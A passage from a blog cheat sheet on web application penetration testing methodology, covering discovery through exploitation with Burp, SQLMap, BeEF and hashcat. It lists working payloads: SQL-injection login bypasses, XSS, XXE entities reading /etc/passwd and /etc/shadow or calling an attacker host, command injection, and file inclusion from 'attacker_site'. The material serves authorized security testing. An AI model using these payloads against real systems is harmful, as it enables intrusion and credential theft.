<p>I’ll often use <code class="highlighter-rouge">Burp Intruder</code> to fuzz the <code class="highlighter-rouge">User-Agent</code> and <code class="highlighter-rouge">Referer</code> headers for some of these pages as well. Typically using a wordlist from the <code class="highlighter-rouge">FuzzDB</code> project as well.</p>

<h3 id="automated-discovery">Automated Discovery</h3>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Burp Scanner</td>
      <td>Burp Suite tool used for automatically finding security vulnerabilities in web applications.</td>
    </tr>
  </tbody>
</table>

<p>While you’ve been mapping the application and conducting the initial parts of discovery <code class="highlighter-rouge">Burp Passive Scanner</code>
 has been running in the background analyzing the target for 
vulnerabilities. These scan results should be reviewed prior to kicking 
off a scan with <code class="highlighter-rouge">Burp Active Scanner</code> with any particularly stand-out pages made note of so that you can investigate them further at a later time.</p>

<p>Due to the <strong>very</strong> long amount of time that it takes for <code class="highlighter-rouge">Burp Active Scanner</code> to complete I usually prefer to run it in bursts, reviewing scan results in between and making note of the results.</p>

<div class="note warning">
<h5>Automated Scanning is dangerous</h5>
<p>Using Burp Scanner may result in unexpected effects in some 
applications. Until you are fully familiar with its functionality and 
settings, you should only use Burp Scanner against non-production 
systems.</p>
</div>

<h3 id="configuration">Configuration</h3>

<h4 id="default-configurations">Default Configurations</h4>

<p>Testing for default configurations is a logical follow-up step after 
enumerating the different technologies in-use by the target during 
mapping. A lot of frameworks ship with vulnerable pre-configured 
applications in order to introduce developers to their offerings. 
However, a lot of these “sample applications” are vulnerable out of the 
box! Better still if they exist on the same web server as the target 
(usually due to developer negligence, and forgotten about) they can 
oftentimes expose it to attack.</p>

<h4 id="testing-for-misconfigurations">Testing for Misconfigurations</h4>

<p>Ideally you should be keeping an eye out for misconfigurations in the
 application at all stages of testing. But, some big things you want to 
look out for at this point are verbose error messages since they will 
oftentimes give away useful information about <strong>database structure</strong> and the <strong>web server file system</strong>.</p>

<div class="note important">
<h5>Verbose Error Messages Are Almost Always a Finding</h5>
<p>The knowledge that these error messages give to attackers can often 
help in exploiting successful injection or LFI (local file include) 
attacks.</p>
</div>

<p>Another thing to look out for is any sensitive form fields that do 
not explicitly disable autofill. A big one that I see quite a bit is 
password fields with a “show/hide” button. By default browsers do not 
save the values entered for <code class="highlighter-rouge">input</code> tags with a <code class="highlighter-rouge">type="password"</code> attribute. However, when the “show” button is pressed it changes the <code class="highlighter-rouge">input</code> to <code class="highlighter-rouge">type="text"</code>
 which the browser can put in it’s autofill cache. This is a risk if the
 application can ever be used in a shared computing environment.</p>

<h3 id="authentication">Authentication</h3>

<p>During the discovery process you should scrutinize any login forms 
that you come across. If these forms are not properly secured (e.g. 
2-factor, captcha, retry attempt lockout, etc.) an attacker can often 
gain unauthorized access to user account/s. Depending on how these forms
 are written or what framework / CMS is being used the target 
application may reveal the existence of a user account even if a login 
attempt fails.</p>

<p>If any of these are true in your test it should almost always be 
noted and reported as a finding. Further, if any of the login forms are 
not using encryption (or an outdated/broken version of SSL/TLS) that 
should be noted and reported as well.</p>

<h4 id="fuzzing-logins">Fuzzing Logins</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>CeWL</td>
      <td>Wordlist generator that creates wordlists by spidering target web sites</td>
    </tr>
    <tr>
      <td>Burp Intruder</td>
      <td>Burp suite tool used to automate customized attacks against web applications (e.g. brute forcing, injection, etc.)</td>
    </tr>
  </tbody>
</table>

<p>After you’ve scrutinized the applications login form/s it’s usually a good time to do some fuzzing. <code class="highlighter-rouge">CeWL</code>
 is a really great tool for building custom wordlists for just this 
purpose. You should review the help documentation first by using the <code class="highlighter-rouge">-h</code> switch.</p>

<p>For reference the syntax you will use will always be something like</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>cewl [options] www.example.com
</code></pre></div></div>

<p>Once you’ve crafted your custom wordlist it’s time to break out <code class="highlighter-rouge">Burp Intruder</code>
 once again and do the actual fuzzing. Generally I do this using 
two-payload sets (one being a wordlist of usernames and the other my <code class="highlighter-rouge">CeWL</code> generated list for the passwords). The attack type you should typically use in intruder for this type of fuzzing is <code class="highlighter-rouge">Cluster Bomb</code>.</p>

<h3 id="session-management">Session Management</h3>

<p>Session-token / Cookie analysis is not a particularly glamorous part 
of any engagement but it’s an important one nonetheless. Typically you 
want to try and get an understanding of what the target application is 
using for session tracking and then test the session-tokens themselves 
using a tool like <code class="highlighter-rouge">Burp Sequencer</code> 
in order to determine how random/predictable they are. Further, some 
applications (generally legacy apps) will store session contents on the 
client-side. Occasionally this data will contain encoded, serialized 
objects that could potentially hold sensitive information.</p>

<p>This is also the time to check if the <code class="highlighter-rouge">Set-Cookie</code> header of the http responses from the web server contains <code class="highlighter-rouge">Secure</code> and <code class="highlighter-rouge">HttpOnly</code> flags. If not this should be noted and reported as a finding as there is never really a reason not to include these flags.</p>

<div class="note info">
<h5>Ask Google</h5>
<p>It only takes a minute to google search the particular session token 
that you have from the target. This could potentially lead to being able
 to predict session tokens, which opens the door to session hijacking 
attacks.</p>
</div>

<h4 id="testing-session-tokens-with-burp">Testing Session Tokens With Burp</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Burp Sequencer</td>
      <td>Burp Suite tool for analyzing randomness in a collection of data.</td>
    </tr>
  </tbody>
</table>

<p><code class="highlighter-rouge">Burp Sequencer</code> is an excellent
 tool that allows us to test session-tokens for randomness and 
predictability. While you are testing session-management you should use 
this tool to analyze the session token by <strong>clearing your cookies</strong> and then authenticating into the target application. Send the HTTP response containing the <code class="highlighter-rouge">Set-Cookie</code> header to <code class="highlighter-rouge">Burp Sequencer</code>
 and then have the sequencer analyze the token by starting a live 
capture. Typically it’s okay stop the live capture after ~10,000 
requests as that is generally sufficient to determine randomness and 
predictability in the session-tokens.</p>

<p>If session tokens are not sufficiently random it opens the door to session hijacking attacks, and should be noted.</p>

<h3 id="authorization">Authorization</h3>

<p>Authorization issues like <a href="https://www.owasp.org/index.php/Top_10_2013-A7-Missing_Function_Level_Access_Control">missing function level access control</a>, and <a href="https://www.owasp.org/index.php/Top_10_2013-A4-Insecure_Direct_Object_References">insecure direct object reference</a>
 are among the most prevalent findings that I come across a majority of 
the time. This is because a lot of developers do not take into account 
the idea that a low-privilege user, or even an unauthenticated user, 
would try to send requests to higher-privilege endpoint (broken access 
control)</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://example.com/app/admin_getappInfo
</code></pre></div></div>

<p>or attempt to access data belonging to a different user (insecure direct objet reference)</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://example.com/app/accountInfo?acct=notmyacct
</code></pre></div></div>

<h4 id="testing-access-control">Testing Access Control</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Compare Site Maps</td>
      <td>Burp Tool for testing authorization by comparing site maps</td>
    </tr>
  </tbody>
</table>

<p>This is a technique that I like to use after I’ve acquired two 
different user accounts intended to have different access levels within 
the target application (usually a standard account and an admin account,
 but this also works for testing unauthenticated users as well).</p>

<p>I will map the application using the higher-privilege account, logout
 of the application, login as the lower-privilege user, then use Burp’s <code class="highlighter-rouge">Compare Site Maps</code>
 tool in order to see what resources I can access as the lower-privilege
 user that should be limited to only the higher-privilege user.</p>

<div class="note important">
<h5>Make sure your target is added to the default session-handing rule's scope!</h5>
</div>

<h3 id="data-validation-testing">Data Validation Testing</h3>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Burp Repeater</td>
      <td>Simple tool for manually manipulating and reissuing individual HTTP requests</td>
    </tr>
  </tbody>
</table>

<p>Injection vulnerabilities exist in web applications because they 
accept arbitrary user input, and do not properly validate it on the 
server-side. As a tester you should make note of any areas of the 
application that accept arbitrary user input and try to inject into 
them.</p>

<p>All applications are different so there is no one single blanket 
checklist you should follow when testing for injection flaws. However, I
 will try to break them down into sub-sections along with example 
injection payloads. Further, <code class="highlighter-rouge">Burp Repeater</code>
 is typically what I use the most when testing for injection flaws. It 
is a relatively-simple tool that lets you repeat requests to the same 
endpoint while giving you the opportunity to change the payload each 
time.</p>

<p>Something <strong>very</strong> important to keep in mind: The 
purpose of discovery is to simply identify the flaws, whereas with 
exploitation we want to see how far they go. Obviously, the existence of
 any of these injection flaws is worthy of reporting, however try to 
save in-depth testing of each one after the discovery phase.</p>

<p>Please refer to the <a href="https://www.owasp.org/">OWASP</a> links in each sub-section for more information.</p>

<h4 id="sql-injection">SQL Injection</h4>

<p>If any inputs are used in queries to a database they could possibly 
be vulnerable to SQL injection. Combined with misconfiguration issues 
such as <strong>verbose error messages</strong> this can lead to significant amounts of data being compromised by an attacker.</p>

<p>I recommend reading <a href="https://sqlwiki.netspi.com/#mysql">this wiki by Netspi</a>
 when testing for SQL injection as it’s a great resource. At it’s 
simplest though, if you get a database error back from any of these 
payloads odds are that the target is vulnerable to SQL injection.</p>

<p><code class="highlighter-rouge">Sqlmap</code> is a tool that allows for testing for sql injection in an automated way, and I will dig into its use further in the <strong>exploitation</strong> section.</p>

<p><a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)">OWASP - Testing for SQL Injection</a></p>

<p><strong>Examples</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>' OR 1=1 -- 1
' OR '1'='1
' or 1=1 LIMIT 1;-- 
admin';--

http://www.example.com/product.php?id=10 AND 1=1
</code></pre></div></div>

<h4 id="cross-site-scripting-xss">Cross-site Scripting (XSS)</h4>

<p>Cross-site Scripting (XSS) attacks occur when an attacker uses a web 
application to send malicious code, generally in the form of JavaScript,
 to a different end user.</p>

<p>There are 3 different types of XSS that you should keep an eye out for:</p>
<ol>
  <li><strong>Stored</strong> - A Stored XSS vulnerability exists when 
data provided to a web application by a user is first stored 
persistently on the server.</li>
  <li><strong>Reflected</strong> - A Reflected XSS vulnerability exists 
when data provided by a web client is used immediately by server-side 
scripts to generate a page of results for that user.</li>
  <li><strong>DOM-Based</strong> - A DOM-based XSS vulnerability exists within a page’s client-side script itself.</li>
</ol>

<p><a href="https://www.owasp.org/index.php/Testing_for_Cross_site_scripting">OWASP - Testing for Cross-site Scripting</a></p>

<p><strong>Examples</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;IMG SRC=javascript:alert('XSS')&gt;
"&gt;&lt;script&gt;alert('XSS')&lt;/script&gt;&lt;"
" onmouseover="alert('XSS')

http://server/cgi-bin/testcgi.exe?&lt;SCRIPT&gt;alert(“Cookie”+document.cookie)&lt;/SCRIPT&gt;
%3cscript src=http://www.example.com/malicious-code.js%3e%3c/script%3e
</code></pre></div></div>

<h4 id="xml-injection">XML Injection</h4>

<p>XML Injection testing is when a tester tries to inject an XML doc to 
the application. If the XML parser fails to contextually validate data, 
then the test will yield a positive result.</p>

<p><a href="https://www.owasp.org/index.php/Testing_for_XML_Injection_(OTG-INPVAL-008)">OWASP - Testing for XML Injection</a></p>

<p><strong>Examples</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Username = foo&lt;
Username = foo&lt;!--
</code></pre></div></div>

<h5 id="xml-external-entities-xxe">XML External Entities (XXE)</h5>

<p>If the definition of an entity is a URI, the entity is called an 
external entity. Unless configured to do otherwise, external entities 
force the XML parser to access the resource specified by the URI, e.g., a
 file on the local machine or on a remote systems.</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="cp">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span>
 <span class="cp">&lt;!DOCTYPE foo [  
   &lt;!ELEMENT foo ANY &gt;</span>
   <span class="cp">&lt;!ENTITY xxe SYSTEM "file:///etc/passwd" &gt;</span>]&gt;<span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>

 <span class="cp">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span>
 <span class="cp">&lt;!DOCTYPE foo [  
   &lt;!ELEMENT foo ANY &gt;</span>
   <span class="cp">&lt;!ENTITY xxe SYSTEM "file:///etc/shadow" &gt;</span>]&gt;<span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>

 <span class="cp">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span>
 <span class="cp">&lt;!DOCTYPE foo [  
   &lt;!ELEMENT foo ANY &gt;</span>
   <span class="cp">&lt;!ENTITY xxe SYSTEM "file:///c:/boot.ini" &gt;</span>]&gt;<span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>

 <span class="cp">&lt;?xml version="1.0" encoding="ISO-8859-1"?&gt;</span>
 <span class="cp">&lt;!DOCTYPE foo [  
   &lt;!ELEMENT foo ANY &gt;</span>
   <span class="cp">&lt;!ENTITY xxe SYSTEM "http://www.attacker.com/text.txt" &gt;</span>]&gt;<span class="nt">&lt;foo&gt;</span><span class="ni">&amp;xxe;</span><span class="nt">&lt;/foo&gt;</span>
</code></pre></div></div>

<h4 id="template-injection">Template Injection</h4>

<p>Template injection allows an attacker to include template code into an existant (or not) template.</p>

<p><a href="http://blog.portswigger.net/2015/08/server-side-template-injection.html">Portswigger - Server Side Template Injecton</a></p>

<p><strong>Examples</strong></p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>&lt;%= 7 * 7 %&gt;
{{ 7 * 7 }}
</code></pre></div></div>

<h4 id="os-command-injection">OS Command Injection</h4>

<p>OS Command Injection is a technique where a user injects OS commands 
into web application interface with the intention of those commands 
executing on the web server.</p>

<p><a href="https://www.owasp.org/index.php/Testing_for_Command_Injection_(OTG-INPVAL-013)">OWASP - Testing for Command Injection</a></p>

<p><strong>Examples</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://sensitive/cgi-bin/userData.pl?doc=/bin/ls|
http://sensitive/something.php?dir=%3Bcat%20/etc/passwd

Doc=Doc1.pdf+|+Dir c:\
</code></pre></div></div>

<h4 id="open-redirection">Open Redirection</h4>

<p>Open redirection is an input validation flaw that exists when an 
application accepts an user controlled input which specifies a link that
 leads to an external URL that could be malicious.</p>

<p><a href="https://www.owasp.org/index.php/Testing_for_Client_Side_URL_Redirect_(OTG-CLIENT-004)">OWASP - Testing for Client Side URL Redirect</a></p>

<p><strong>Examples</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.target.site?#redirect=www.fake-target.site 
http://www.target.site??url=http://www.fake-target.site 
</code></pre></div></div>

<h4 id="local-file-inclusion-lfi">Local File Inclusion (LFI)</h4>

<p>Local File Inclusion (also known as LFI) is the process of including 
files, that are already locally present on the server, through the 
exploiting of vulnerable inclusion procedures implemented in the 
application.</p>

<p><a href="https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion">OWASP - Testing for Local File Inclusion</a></p>

<p><strong>Examples</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://vulnerable_host/preview.php?file=../../../../etc/passwd
http://vulnerable_host/preview.php?file=../../../../etc/passwd%00
</code></pre></div></div>

<h4 id="remote-file-inclusion-rfi">Remote File Inclusion (RFI)</h4>

<p>Remote File Inclusion (also known as RFI) is the process of including
 remote files through the exploiting of vulnerable inclusion procedures 
implemented in the application.</p>

<p><a href="https://www.owasp.org/index.php/Testing_for_Remote_File_Inclusion">OWASP - Testing for Remote File Inclusion</a></p>

<p><strong>Examples</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://vulnerable_host/vuln_page.php?file=http://attacker_site/malicous_page
</code></pre></div></div>

<h3 id="business-logic">Business Logic</h3>

<p>Discovering flaws in business logic requires you, as the attacker, to
 have a decent fundemental understanding of the target application. Once
 you know the way the application is intended to be used you can start 
to reason how it could be exploited. When testing for business logic 
flaws refer back to areas of the application where you as the user are 
expected to complete a series of actions in a certain order (e.g. 
password reset form, order form, etc.) and try executing those actions 
out of order.</p>

<p>Further, you should check if a user is able to enter unrealistic 
values into certain inputs fields within the application (e.g. a fitness
 app where a user is expected to enter the amount of miles run)?</p>

<p>This is also a good time to test for <a href="https://www.owasp.org/index.php/Unrestricted_File_Upload">unrestricted file upload</a>.</p>

<h3 id="encryption-flaws">Encryption Flaws</h3>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>SSLyze</td>
      <td>TLS/SSL Implementation Analyzer</td>
    </tr>
  </tbody>
</table>

<p>When determining the quality of an applications SSL/TLS implementation I always recommend starting out with the <a href="https://www.ssllabs.com/ssltest/">SSL Labs’ Server Test</a>, and <code class="highlighter-rouge">SSLyze</code> if that can’t be done.</p>

<p><strong>SSLyze Example</strong></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>sslyze --regular www.example.com
</code></pre></div></div>

<p>Generally, this boils down to:</p>
<ol>
  <li>Whether or not the application is using some form of encryption.</li>
  <li>Is that encryption protocol insecure or vulnerable (TLS 1.2, SSL2/SSl3)?</li>
</ol>

<p>You should also use this time to investigate if the application is 
using weak encryption algorithms (e.g. MD5, RC4, etc.) and supports 
forward secrecy.</p>

<h3 id="denial-of-service">Denial-of-Service</h3>

<p>In a nutshell Denial-of-Service (DoS) is an attack wherein the 
prepetrator aims to make the target application unavilable to its users 
in one way or another. Denial-of-Service attack vectors can range from 
user file uploads (if they are not logically restricted by size) to a 
user account lockout mechanism in place to prevent brute force login 
attempts.</p>

<p>If there are any pages that take a long time to load or ajax requests
 that take a long time to come back, these could be indicators of poorly
 written SQL queries that could be leveraged to perform a DoS attack.</p>

<h3 id="flash-applications">Flash Applications</h3>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Firefox Developer Tools</td>
      <td>Developer tools built into Firefox for examining, editing, and debugging client-side code</td>
    </tr>
    <tr>
      <td>JPEXS (FFDec)</td>
      <td>Open source SWF decompiler and editor</td>
    </tr>
  </tbody>
</table>

<p>If the application that you’re testing makes use of flash or other 
compiled client-side technologies (e.g. silverlight) it’s worth it to 
download them to your filesystem and use a tool like <code class="highlighter-rouge">JPEXS FFDec</code>
 to decompile them and examine the source code. If you’re able to 
successfully reverse engineer the application you may uncover some flaws
 in the underlying code.</p>

<h2 id="testing-web-services">Testing Web Services</h2>

<p>Web services are technologies used for machine to machine 
communication, but they should be tested using the same methodology that
 you’ve been employing prior to this (mapping -&gt; discovery -&gt; 
exploitation), using <code class="highlighter-rouge">Burp</code> to intercept requests and analyze responses from the API endpoint/s.</p>

<h4 id="testing-rest-web-services">Testing REST Web Services</h4>

<p>Ideally the first thing you should do prior to testing a REST web 
service is read the documentation if it is available. Typically, this 
will be the case when conducting a white-box or grey-box penetration 
testing and is generally perfered since it will allow for a more 
comprehensive test.</p>

<p>In a black-box test we can use <code class="highlighter-rouge">Burp</code> to intercept the request/response pairs and look at any information returned in a <code class="highlighter-rouge">JSON</code> format to try and gain and understanding of the API, but this is very tedious and not recommended if possible.</p>

<p>Regardless, since REST uses the <code class="highlighter-rouge">http</code>
 protocol vs something like SOAP services we can test the API endpoints 
for the same vulnerabilities that we have previously in the <strong>discovery</strong> phase such as SQL injection, and XSS.</p>

<p>Please refer to these articles for additional resources when testing REST APIs.</p>

<ul>
  <li><a href="https://support.portswigger.net/customer/portal/articles/1965674-using-burp-to-test-for-cross-site-request-forgery-csrf-">https://support.portswigger.net/customer/portal/articles/1965674-using-burp-to-test-for-cross-site-request-forgery-csrf-</a></li>
  <li><a href="http://blog.isecurion.com/2017/10/10/penetration-testing-restful-web-services/">http://blog.isecurion.com/2017/10/10/penetration-testing-restful-web-services/</a></li>
  <li><a href="https://www.owasp.org/index.php/REST_Assessment_Cheat_Sheet">https://www.owasp.org/index.php/REST_Assessment_Cheat_Sheet</a></li>
</ul>

<h4 id="testing-soap-web-services">Testing SOAP Web Services</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>WSDLER (BApp)</td>
      <td>Parses WSDL files to create sample requests for all available methods</td>
    </tr>
  </tbody>
</table>

<p>Although these days I certainly see more REST than I do SOAP when 
testing application web services it is still there and still something 
you should keep an eye out for.</p>

<p>Something very nice about SOAP-based web services is that they are 
self documenting via WSDL (web service definition language) files. You 
can use a tool such as <code class="highlighter-rouge">Wsdler (BApp)</code> to parse these files and send sample requests via <code class="highlighter-rouge">Burp Repeater</code> to the endpoint.</p>

<p>Same as REST, these services should be tested for the same 
vulnerabilities as the other areas of the application (e.g. sql 
injection, xss, etc.)</p>

<ul>
  <li>Check out any service-related paths found during mapping/discovery
    <ul>
      <li>e.g. <a href="http://exampleapplication.com/service">http://exampleapplication.com/service</a></li>
    </ul>
  </li>
  <li>View the WSDL file for the service to load it into Burp</li>
  <li>Go to the Burp Proxy history tab and add the WSDL file to the Wsdler extension via the “Parse WSDL” context menu option.</li>
  <li>Send the sample request to Repeater and determine how the service works</li>
</ul>

<p>Please refer to these articles for additional resources when testing SOAP APIs.</p>

<p><a href="https://blog.netspi.com/hacking-web-services-with-burp/">https://blog.netspi.com/hacking-web-services-with-burp/</a></p>

<h2 id="exploitation">Exploitation</h2>

<blockquote>
  <p>In an engagement the goal of exploitation is to leverage the vulnerabilities found during discovery and measure how <strong>deep they go</strong> and the <strong>true risk that they pose.</strong></p>
</blockquote>

<p>In a nutshell what you want to do at this point is refer to the notes that you’ve taken during <strong>information gathering</strong>, <strong>mapping</strong>, and <strong>discovery</strong>
 and dig as deep as possible into the vulnerabilities that you’ve 
discovered. Occasionally during the exploitation process you may 
traverse different (higher) levels of privilege within the target 
application. If this happens you want to go back and iterate over the 
methodology again starting at <strong>mapping</strong>.</p>

<p>What follows are some example <strong>exploitation</strong> scenarios, but this step is unique to every engagement.</p>

<div class="note important">
<h5>Remember: you are taking your discovery findings to the next level!</h5>
<p>which requires a lot of independent research that I cannot possibly fit into a single cheat sheet.</p>
</div>

<h3 id="exploitation-scenarios">Exploitation Scenarios</h3>

<h3 id="exploiting-cross-site-scripting">Exploiting Cross-site Scripting</h3>

<h4 id="browser-hyjacking">Browser Hyjacking</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>BeEF</td>
      <td>A web-based interface for command and control of XSS-ed zombie browsers</td>
    </tr>
  </tbody>
</table>

<p>If you’ve determined that the target application is indeed vulnerable to XSS during <strong>discovery</strong> a good step to take during exploitation is to see if you can use a tool like <code class="highlighter-rouge">BeEF</code> to “hook” zombie browsers via XSS.</p>

<p><a href="https://null-byte.wonderhowto.com/how-to/hack-like-pro-hack-web-browsers-with-beef-0159961/">Here is a good article on doing just that</a></p>

<p>Generally this is something you would use your own browser for in an 
isolated environment as a proof of concept for just how dangerous XSS is
 when you eventually present your findings to the client.</p>

<h3 id="exploiting-sql-injection">Exploiting SQL injection</h3>

<h4 id="data-extraction">Data Extraction</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>SQLMap</td>
      <td>An automated SQL injection tool that both detects and exploits SQL injection flaws on many popular RDBMSs</td>
    </tr>
  </tbody>
</table>

<p>If the target application is vulnerable to SQL injection <code class="highlighter-rouge">SQLMap</code> will usually be the go-to tool in order to extract data during exploitation.</p>

<p>There is a great tutorial on the <a href="http://sqlmap.org/">SQLMap site</a> regarding the specific switches and how they work. that I recommend you refer to when first starting out with the tool.</p>

<h4 id="offline-password-cracking">Offline Password Cracking</h4>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Hashcat</td>
      <td>World's fastest and most advanced password recovery utility</td>
    </tr>
  </tbody>
</table>

<p>This one is a bit of a strech but something you should try if you get
 a dump of user account passwords from the target application.</p>

<p>If the passwords are stored using a 1-way hashing algorithm you can likely use <code class="highlighter-rouge">hashcat</code> along with a good wordlist such as <code class="highlighter-rouge">rockyou.txt</code> to crack them as detailed in <a href="https://www.alpinesecurity.com/blog/2017/12/15/offline-password-cracking-the-attack-and-the-best-defense-against-it">this article</a>.</p>

<p>Needless to say something like this would be among the biggest 
findings you could bring to a client at the end of a penetration test.</p>

<h4 id="authentication-bypass">Authentication Bypass</h4>

<p>Something worth trying at this point (if you haven’t already) is to 
attempt to elevate your privilege within the application via SQL 
injection if you can. There are a good number of articles online about 
this, but here are a few sample payloads you can try entering on a 
vulnerable login form (leave password field blank of course)</p>

<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
</code></pre></div></div>

<h3 id="cross-site-request-forgery-csrf">Cross-site Request Forgery (CSRF)</h3>

<table>
  <thead>
    <tr><th>Name</th>
    <th>Description</th>
  </tr></thead>
  <tbody>
    <tr>
      <td>Burp: Generate CSRF PoC</td>
      <td>Burp tool used to generate a CSRF proof of concept against the target application</td>
    </tr>
  </tbody>
</table>

<p>If it comes to light that your target is vulnerable to CSRF (usually one of the first things <code class="highlighter-rouge">Burp Scanner</code> will pick up) you can use the Burp tool <code class="highlighter-rouge">Generate CSRF PoC</code> to validate if the target application is indeed vulnerable.</p>

<p><a href="https://support.portswigger.net/customer/portal/articles/1965674-using-burp-to-test-for-cross-site-request-forgery-csrf-">Here is a tutoral</a> from portswigger on how to use the tool.</p>

<p>However, it’s generally just a matter of:</p>
<ol>
  <li>Intercepting an HTTP request (ideally one where your testing account is changing some account information)</li>
  <li>Right-clicking that request in Burp</li>
  <li>Generating the CSRF PoC (and modifying some details of the request body)</li>
  <li>Saving the CSRF PoC to an <code class="highlighter-rouge">html</code> file</li>
  <li>Opening the new <code class="highlighter-rouge">html</code> file and clicking the <code class="highlighter-rouge">submit request</code> button</li>
  <li>Validating that the attacker-intended change happened.</li>
</ol>

<h2 id="closing">Closing</h2>

<p>Thanks for reading! The goal of this sheet is to be a resource to 
anyone conducting a web application penetration test. The intent being 
to highlight <strong>methodology</strong> over all else.</p>

<p>With that in mind this is a living document and will be updated regularly over time as I receive feedback on it.</p>

    <section class="share-buttons">
  <h2>Enjoy the content? Share it!</h2>
  <!-- Sharingbutton Twitter -->
  <a class="resp-sharing-button__link" href="https://twitter.com/intent/tweet?text=Web%20Application%20Penetration%20Testing%20Cheat%20Sheet&amp;url=https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/&amp;via=0xJDow&amp;related=0xJDow" target="_blank" aria-label="Twitter">
    <div class="resp-sharing-button resp-sharing-button--twitter resp-sharing-button--medium">
      <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
          <path d="M23.44 4.83c-.8.37-1.5.38-2.22.02.93-.56.98-.96 1.32-2.02-.88.52-1.86.9-2.9 1.1-.82-.88-2-1.43-3.3-1.43-2.5 0-4.55 2.04-4.55 4.54 0 .36.03.7.1 1.04-3.77-.2-7.12-2-9.36-4.75-.4.67-.6 1.45-.6 2.3 0 1.56.8 2.95 2 3.77-.74-.03-1.44-.23-2.05-.57v.06c0 2.2 1.56 4.03 3.64 4.44-.67.2-1.37.2-2.06.08.58 1.8 2.26 3.12 4.25 3.16C5.78 18.1 3.37 18.74 1 18.46c2 1.3 4.4 2.04 6.97 2.04 8.35 0 12.92-6.92 12.92-12.93 0-.2 0-.4-.02-.6.9-.63 1.96-1.22 2.56-2.14z"></path>
        </svg>
      </div>Twitter</div>
  </a>
  
  <!-- Sharingbutton Google+ -->
  <a class="resp-sharing-button__link" href="https://plus.google.com/share?url=https://jdow.io/blog/2018/03/18/web-application-penetration-testing-methodology/" target="_blank" aria-label="Google+">
    <div class="resp-sharing-button resp-sharing-button--google resp-sharing-button--medium">
      <div aria-hidden="true" class="resp-sharing-button__icon resp-sharing-button__icon--solid">
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
          <path d="M11.37 12.93c-.73-.52-1.4-1.27-1.4-1.5 0-.43.03-.63.98-1.37 1.23-.97 1.9-2.23 1.9-3.57 0-1.22-.36-2.3-1-3.05h.5c.1 0 .2-.04.28-.1l1.36-.98c.16-.12.23-.34.17-.54-.07-.2-.25-.33-.46-.33H7.6c-.66 0-1.34.12-2 .35-2.23.76-3.78 2.66-3.78 4.6 0 2.76 2.13 4.85 5 4.9-.07.23-.1.45-.1.66 0 .43.1.83.33 1.22h-.08c-2.72 0-5.17 1.34-6.1 3.32-.25.52-.37 1.04-.37 1.56 0 .5.13.98.38 1.44.6 1.04 1.84 1.86 3.55 2.28.87.23 1.82.34 2.8.34.88 0 1.7-.1 2.5-.34 2.4-.7 3.97-2.48 3.97-4.54 0-1.97-.63-3.15-2.33-4.35zm-7.7 4.5c0-1.42 1.8-2.68 3.9-2.68h.05c.45 0 .9.07 1.3.2l.42.28c.96.66 1.6 1.1 1.77 1.8.05.16.07.33.07.5 0 1.8-1.33 2.7-3.96 2.7-1.98 0-3.54-1.23-3.54-2.8zM5.54 3.9c.33-.38.75-.58 1.23-.58h.05c1.35.05 2.64 1.55 2.88 3.35.14 1.02-.08 1.97-.6 2.55-.32.37-.74.56-1.23.56h-.03c-1.32-.04-2.63-1.6-2.87-3.4-.13-1 .08-1.92.58-2.5zM23.5 9.5h-3v-3h-2v3h-3v2h3v3h2v-3h3"></path>
        </svg>
      </div>Google+</div>
  </a>
  
